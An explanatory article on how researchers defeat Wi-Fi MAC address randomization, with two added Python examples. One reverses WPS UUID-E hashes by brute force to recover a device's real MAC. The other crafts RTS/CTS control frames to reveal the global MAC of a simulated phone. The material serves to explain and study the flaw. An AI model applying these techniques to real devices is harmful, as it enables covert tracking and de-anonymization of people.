What is MAC Address Randomization?
MAC address randomization is a technique used to protect mobile devices from tracking. Instead of exposing the globally unique hardware identifier of the device's wireless interface in frames such as probe requests, the device substitutes a randomly generated address. This makes it harder to recognize the same device across time and locations and to link its appearances to one person.
The technique is useful because a smartphone's MAC address is routinely logged by operators of public Wi-Fi networks, for example at retail outlets, so that a returning customer can be recognized the moment they walk in.
The same happens at public wireless hotspots. In the UK, for instance, Transport for London has used this approach to monitor the movements of Tube passengers. Identifying customers for service purposes is arguably acceptable in theory; it becomes a real problem when the collected data is sold to marketers and advertising firms.
MAC Address Randomization Vulnerability
According to a research report from the US Naval Academy, MAC address randomization itself is flawed: the implementations contain vulnerabilities that allow the protection to be bypassed.
The researchers successfully tracked 100% of the tested devices that use randomization, regardless of make and model, by exploiting a previously unknown flaw in the way wireless chipsets handle low-level control frames.
A related technique from research published in 2016 tracked about 50% of smartphones despite MAC address randomization.
As the analysis explains, every 802.11 network interface in a mobile phone carries a 48-bit layer-2 hardware identifier, the MAC address, which is meant to be globally unique. This burned-in address is the "global" MAC address referred to below, as opposed to the randomized addresses a device substitutes for it.
Earlier studies found flaws in the Wi-Fi Protected Setup (WPS) protocol that can be used to recover a device's global MAC address even while it is randomizing: the Universally Unique IDentifier-Enrollee (UUID-E) that a device includes in its WPS probe requests is derived from its MAC address, and the technique that undoes that derivation is called UUID-E reversal.
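To make the UUID-E reversal concrete, the following is an added example written for this page, not code from the research papers or from any Wi-Fi stack. It reproduces the name-based (UUID version 5) derivation SHA-1(namespace || MAC) and then recovers the MAC by trying every NIC-specific suffix under a known OUI. The namespace constant is quoted from memory of wpa_supplicant's uuid_gen_mac_addr() and should be treated as an assumption; the sample MAC is constructed. The important point is that the derivation is an unsalted hash over a 48-bit input, so once the OUI is guessed only 2^24 candidates remain, cheap enough to brute-force or precompute.

```python
import hashlib
import uuid

# Namespace ID that wpa_supplicant's uuid_gen_mac_addr() hashes together with
# the MAC (quoted from memory by the editor; treat this constant as an assumption).
WPS_UUID_NSID = bytes.fromhex("526480f8c99b4be5a65558ed5f5d6084")


def uuid_e_from_mac(mac: str) -> str:
    """Name-based (version 5) UUID: SHA-1(namespace || MAC) truncated to 128 bits,
    with the RFC 4122 version and variant bits patched in."""
    digest = hashlib.sha1(WPS_UUID_NSID + bytes.fromhex(mac.replace(":", ""))).digest()
    u = bytearray(digest[:16])
    u[6] = (5 << 4) | (u[6] & 0x0F)  # version nibble = 5
    u[8] = 0x80 | (u[8] & 0x3F)      # RFC 4122 variant bits
    return str(uuid.UUID(bytes=bytes(u)))


def reverse_uuid_e(target_uuid_e: str, oui: str, nic_candidates=range(1 << 24)):
    """Recover the global MAC behind a UUID-E by trying every NIC-specific
    suffix under a known OUI (e.g. the vendor prefix of a phone chipset).
    The hash is unsalted and the per-OUI input space is only 2^24, so the
    full search is cheap and lookup tables can be precomputed."""
    target = target_uuid_e.lower()
    oui = oui.lower()
    for nic in nic_candidates:
        mac = f"{oui}:{(nic >> 16) & 0xFF:02x}:{(nic >> 8) & 0xFF:02x}:{nic & 0xFF:02x}"
        if uuid_e_from_mac(mac) == target:
            return mac
    return None


if __name__ == "__main__":
    sample_mac = "a4:c3:f0:00:01:23"  # constructed sample global MAC
    observed = uuid_e_from_mac(sample_mac)  # what a sniffer would see in the WPS IE
    print("UUID-E in probe request:", observed)
    # Small candidate range so the demo finishes instantly; use the default
    # range(1 << 24) to search a whole OUI.
    print("recovered MAC:", reverse_uuid_e(observed, "a4:c3:f0", range(0x400)))
```

The search is over the NIC part only because the OUI is usually known or guessable from the device type; in practice the reversal is run against a precomputed table rather than live, which is why a device that keeps sending a static UUID-E in probe requests is trackable no matter how often its MAC changes.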
The attack leverages low-level control frames
Although each OS handles MAC address randomization differently, the researchers found that devices answer with a specific packet (a control frame) when they receive a specific request.
The novelty of their method is to send Request-to-Send (RTS) frames to IEEE 802.11 client devices rather than to access points. When the RTS is addressed to a device's global MAC address, the target answers with a Clear-to-Send (CTS) frame, and that response reveals the device's true global MAC address even though the device is transmitting with a randomized one.
A CTS frame carries no source address, only a receiver address. Because the attacker chose the (spoofed) transmitter address in the RTS frame, a CTS addressed back to that crafted address confirms that the probed device responded to the candidate global MAC.
Once the global MAC address is known, the device can be tracked just as if randomization had never been enabled.
To defend against these attacks on MAC address randomization, the researchers recommend stricter policies for handling such frames; their recommendations are given at the end of the research paper.
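The RTS/CTS exchange above, as an added example that is not part of the original article or the researchers' tooling. It builds the two control frames byte-for-byte (frame control, duration, receiver address, and for RTS the transmitter address; FCS omitted), and runs the probe against a constructed client model that behaves the way the paper says real chipsets do: it probes with a random locally administered MAC but still answers an RTS whose receiver address is its burned-in global MAC. Nothing is transmitted; a real run needs a monitor-mode interface with injection and the candidate MACs come from the OUI of the vendor being tracked, both of which are outside this block. The MAC addresses are constructed for the demo.

```python
import secrets
import struct

# 802.11 Frame Control first byte: version 0, type 1 (control), subtype 11 (RTS)
# packs to 0xB4; subtype 12 (CTS) packs to 0xC4.
FC_RTS = 0xB4
FC_CTS = 0xC4


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def is_locally_administered(mac: str) -> bool:
    """Randomized addresses set the U/L bit (0x02) of the first octet."""
    return bool(mac_to_bytes(mac)[0] & 0x02)


def random_local_mac() -> str:
    b = bytearray(secrets.token_bytes(6))
    b[0] = (b[0] | 0x02) & 0xFE  # locally administered, unicast
    return bytes_to_mac(bytes(b))


def build_rts(ra: str, ta: str, duration: int = 0) -> bytes:
    """RTS = FC(2) | Duration(2) | RA(6) | TA(6). The attacker picks the TA."""
    return struct.pack("<BBH", FC_RTS, 0, duration) + mac_to_bytes(ra) + mac_to_bytes(ta)


def build_cts(ra: str, duration: int = 0) -> bytes:
    """CTS = FC(2) | Duration(2) | RA(6): there is no source address field."""
    return struct.pack("<BBH", FC_CTS, 0, duration) + mac_to_bytes(ra)


def parse_cts(frame: bytes):
    """Return the RA of a CTS frame, or None if the frame is not a CTS."""
    if len(frame) < 10:
        return None
    fc, _flags, _dur = struct.unpack("<BBH", frame[:4])
    if fc != FC_CTS:
        return None
    return bytes_to_mac(frame[4:10])


class SimulatedClient:
    """Constructed model of a randomizing station (not real driver code).
    It probes with a random locally administered MAC but, as the paper
    describes for real chipsets, still answers an RTS addressed to its
    global (burned-in) MAC."""

    def __init__(self, global_mac: str):
        self.global_mac = global_mac.lower()
        self.current_random_mac = random_local_mac()

    def receive(self, frame: bytes):
        if len(frame) < 16:
            return None
        fc, _flags, dur = struct.unpack("<BBH", frame[:4])
        if fc != FC_RTS:
            return None
        ra = bytes_to_mac(frame[4:10])
        ta = bytes_to_mac(frame[10:16])
        if ra in (self.global_mac, self.current_random_mac):
            return build_cts(ta, dur)  # CTS goes back to whatever TA we were given
        return None


def probe_for_global_mac(client: SimulatedClient, candidates, attacker_ta="02:00:5e:00:00:01"):
    """Send one RTS per candidate global MAC from a crafted TA. The candidate
    that yields a CTS addressed to that TA is the device's true global MAC."""
    attacker_ta = attacker_ta.lower()
    for cand in candidates:
        reply = client.receive(build_rts(cand.lower(), attacker_ta))
        if reply is not None and parse_cts(reply) == attacker_ta:
            return cand.lower()
    return None


if __name__ == "__main__":
    phone = SimulatedClient("a4:c3:f0:11:22:33")  # constructed global MAC
    found = probe_for_global_mac(phone, ["00:11:22:33:44:55", "a4:c3:f0:11:22:33"])
    print("address used for probes:", phone.current_random_mac)
    print("recovered global MAC:   ", found)
```

Sending one RTS at a time and matching on the crafted transmitter address is what makes the CTS attributable despite it carrying no source field; if several candidates are probed concurrently the attacker has to fall back on timing to tell the replies apart.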